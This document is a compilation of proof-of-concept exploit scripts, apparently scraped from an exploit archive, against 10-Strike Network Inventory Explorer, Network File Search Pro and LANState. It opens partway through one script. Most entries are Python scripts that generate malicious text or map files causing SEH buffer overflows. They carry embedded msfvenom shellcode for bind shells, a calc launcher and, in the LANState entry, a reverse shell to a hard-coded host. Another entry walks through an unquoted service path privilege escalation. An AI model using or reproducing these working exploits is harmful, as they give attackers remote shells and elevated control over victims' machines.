calc += "\x7b\xab\x0e\xb5\x13\x9a\x85\x5a\x63\x23\x4c\x1f\x9b"
calc += "\x69\xcd\x09\x34\x34\x87\x08\x59\xc7\x7d\x4e\x64\x44"
calc += "\x74\x2e\x93\x54\xfd\x2b\xdf\xd2\xed\x41\x70\xb7\x11"
calc += "\xf6\x71\x92\x71\x99\xe1\x7e\x58\x3c\x82\xe5\xa4"

pad = "\x45"*(3000 - len(junk + seh + fill + rop + nops + calc))

buffer = junk + seh + fill + rop + nops + calc + pad

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
HireHackking 
# Exploit Title      : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)  
# Exploit Author     : Hashim Jawad - ihack4falafel                                                      
# Vendor Homepage    : https://www.10-strike.com/                                                         
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe     
# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                   
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response 
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published 

# Steps to reproduce:
# - Under Computers tab click on 'From Text File'
# - Open Evil.txt and boom!
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting 
#   the stack by 8 bytes, see buffer for reference.
# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on 
#   your username, the following is the path used while developing the exploit (default on Windows 7): 
#   [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
# - Pro edition is effected as well.   

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes

#!/usr/bin/python

shellcode =  ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"

buffer  = '\x41' * 207                           filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61'                     0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90'                     nSEH
buffer += '\x90\x90\x90\x90'                     SEH 
buffer += shellcode                              bind shell 
buffer += '\xcc' * (3000-207-12-len(shellcode))  junk 

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafelx
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response 
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published 

# Steps to reproduce:
# - Under Help, click 'Enter Registration Key'.  
# - Paste the contents of Evil.txt and click OK.
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - There is ample space prior to SEH overwrite.
# - Pro edition is effected as well.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
# - Payload size: 355 bytes

#!/usr/bin/python

shellcode =  ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"

buffer  = '\x41' * 4188                                # filler to nSEH
buffer += '\x75\x06\x74\x06'                           # nSEH | jump net
buffer += '\x7a\x49\xe8\x61'                           # SEH  | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8                                   # nops
buffer += shellcode                                    # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode))       # junk

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open the Application
# 4.- Go to 'Main' or 'Computers'
# 5.- Click upon 'Add'
# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
# 7.- Click "OK"
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed 
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
buf += b"\x31\x75\x65\x50\x41\x41"

nseh = struct.pack("<I", 0x909006EB)
seh = struct.pack("<I", 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)

buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "\xff" * 200
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
HireHackking 
# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
# Date: 2020-03-24
# Author: Felipe Winsnes
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Version: 8.54
# Tested on: Windows 7

# Step to discover Unquoted Service Path: 

C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
srvInventoryWebServer     srvInventoryWebServer     C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe             Auto

# Service info:

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>

# Exploit:

# A successful attempt would require the local user to be able to insert their code in the
# system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local
# user's code would execute with the elevated privileges of the application.
HireHackking 
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################

def write_poc(fname, buffer):
	fhandle = open(fname , 'wb')
	fhandle.write(buffer)
	fhandle.close()

fname="poc.txt"
buf = '\x41' * 0xfe0

#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")

junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)
HireHackking 
# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/lanstate/download.shtml
# Version 8.8
# Tested on: Windows 7 SP 1 x86

# Open LANState, File -> Open, browse to generated lsm file, boom shell.
# If it doesn't work first try, close the tab at the bottom and reopen the file 

#!/usr/bin/python

lsm = """[VERSION INFO]
PROG_NAME=LANState
PROG_VER=8.85
MAP_VER=8.3
MAPID=584636991

[OBJECT#4]
index=4
ObjName=
ObjCaption={0}
ObjHint=
ObjLink=
POS_X=100
POS_Y=0
Width=65
Height=65
ImageWidth=31
ImageHeight=32
StdImageIndex=1
ImageFilePath=
FontName=Arial
FontColor=0
FontSize=8
FontCharset=1
FontStyle=0
TextAlignment=2
TextLayout=0
ObjType=1
OBJ_ID=1
TYPE_ID=2
IP=
REMOTE_NAME=A
MAP_NAME=
MAC_ADDR=
OS=
SNMPAgent=0
SNMPVer=1
SNMPUname=
SNMPPassw=
SNMPPrivPassw=
SNMPSecLevel=0
SNMPAuthType=0
SNMPPrivType=0
Community=
ALWAYS_ON=0
ImageEnabled=0
ImageFile=
IPList=
CurrentUser=
DESCRIPT=
CheckInterval=60
DownTime1=0
DownTime1Start=12:00:00 AM
DownTime1Finish=12:00:00 AM
DownTime2=0
DownTime2Start=12:00:00 AM
DownTime2Finish=12:00:00 AM
DownTime3=0
DownTime3Start=12:00:00 AM
DownTime3Finish=12:00:00 AM
DownTime4=0
DownTime4Start=12:00:00 AM
DownTime4Finish=12:00:00 AM
DownTime5=0
DownTime5Start=12:00:00 AM
DownTime5Finish=12:00:00 AM
DownTime6=0
DownTime6Start=12:00:00 AM
DownTime6Finish=12:00:00 AM
DownTime7=0
DownTime7Start=12:00:00 AM
DownTime7Finish=12:00:00 AM
DTDoNotAlert=1
RunFirstOnly=0
FirstIsPassed=1
CHECK#0/HostAddr={0}
CHECK#0/CID=1
CHECK#0/NumRetries=1
CHECK#0/RetInterval=30
CHECK#0/IsMainCheck=0
CHECK#0/KeepStat=1
CHECK#0/CheckType=0
CHECK#0/CheckOn=1
CHECK#0/CheckRTTime=0
CHECK#0/RTTime=1000
CHECK#0/PacketsCount=4
CHECK#0/TimeOut=500
CHECK#0/SizeBuf=32

[VIEW]
FonImage=0
FonImageFile=
ImagePosition=0
ImageOffsetX=16
ImageOffsetY=16
ImgW=0
ImgH=0
ImgAutoSize=1
ScaleFactor=1
ScrollX=0
ScrollY=0
BkGroundColor=16777215
FontName=Arial
FontColor=-16777208
FontSize=8
FontCharset=1
FontStyle=0
Gradient=0
Color1=15780518
Color2=16777215
WebUseSmallIcons=0
CurIconSize=32
LockAreas=0
LockLines=0
LockHosts=0
WindowState=2
WindowTop=-10
WindowsLeft=12
WindowWidth=800
WindowsHeight=600

"""

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
shellcode =  ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70"
shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61"
shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b"
shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b"
shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46"
shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c"
shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d"
shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77"
shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c"
shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68"
shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70"
shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63"
shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51"
shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f"
shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75"
shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d"
shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78"
shellcode += "\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c"
shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63"
shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69"
shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71"
shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f"
shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30"
shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34"
shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f"
shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30"
shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69"
shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70"
shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30"
shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50"
shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48"
shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42"
shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a"
shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75"
shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50"
shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55"
shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36"
shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44"
shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47"
shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76"
shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74"
shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54"
shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70"
shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e"
shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79"
shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79"
shellcode += "\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70"
shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f"
shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66"
shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f"
shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70"
shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77"
shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63"
shellcode += "\x79\x6f\x6e\x35\x41\x41"

align_stack =  '\x58'                   #  POP EAX
align_stack += '\x58'                   #  POP EAX
align_stack += '\x05\x61\x55\x55\x55'   #  ADD EAX,55555561
align_stack += '\x05\x61\x55\x55\x55'   #  ADD EAX,55555561
align_stack += '\x05\x62\x56\x55\x55'   #  ADD EAX,55555662
align_stack += '\x50'                   #  PUSH EAX
align_stack += '\x5f'                   #  POP EDI

# JMP always true
nseh = '\x71\x06\x70\x04'

#01BA7647 POP POP RET LANState.exe
seh = '\x47\x76\xba\x01'

payload = '\x41' * 235
payload += nseh
payload += seh
payload += align_stack
payload += '\x41' * 265
payload += shellcode
payload += '\x41' * (3492 -len(shellcode + align_stack))

buffer = lsm.format(payload)

file = open('sploit.lsm','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(buffer)
file.close()
print "Map file created!"